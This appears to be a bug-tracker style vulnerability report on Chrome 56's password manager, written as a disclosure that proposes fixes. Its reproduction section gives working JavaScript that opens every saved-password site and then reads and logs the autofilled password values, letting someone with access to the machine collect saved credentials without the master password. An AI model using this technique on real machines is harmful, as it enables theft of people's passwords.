VULNERABILITY DETAILS

Exploit can be used to gather user's admin-protected passwords on Google Chrome without their master password. Chrome's password manager effectively made useless.



VERSIONS

Chrome Version: 56.0.2924.87 (Official Build) (32-bit)
Operating System: Chrome-OS ARM

Chrome Version: 56.0.2924.87 (Official Build) (64-bit)
Operating System: Windows

Probably works on all Chrome versions which include Chrome's Password Manager.



REPRODUCTION CASE

Navigate to chrome://settings/passwords and either use the following JavaScript function to open the top few webpages, or open as many as you desire manually.


function openPasswordedSites() {
    var listOfSites = document.getElementById("saved-passwords-list").children;
    var list = [];
    for (var i = 0; i < listOfSites.length; i++) {
        if (listOfSites[i].className != "spacer")
            window.open( listOfSites[i].children[0].children[0].title );
    }
}

After the sites have been opened, they're automatically filled with passwords which are "starred-out" to avoid shoulder-surfing. The page's password forms can then be manually altered using inspect-element to show the user's passwords by changing it's type from "password" to "text", but to automate this process, the attacker could use a this JavaScript function, and launch it from the page:

function logPagePasswords() {
    console.log(window.location.href);
    var passwords = document.querySelectorAll("[type=password]");
    var passList = [];
    for (var i = 0; i < passwords.length; i++) {
        console.log(passwords[i].value);
        passList.push(passwords[i].value);
    }
    return passList;
}

This exploit could be further automated using a chrome plugin. 



PROPOSED SOLUTIONS

Require user to enter their master-password to auto-fill a form.

Star out websites and usernames associated with websites on the settings/passwords page until the user has entered their master-password.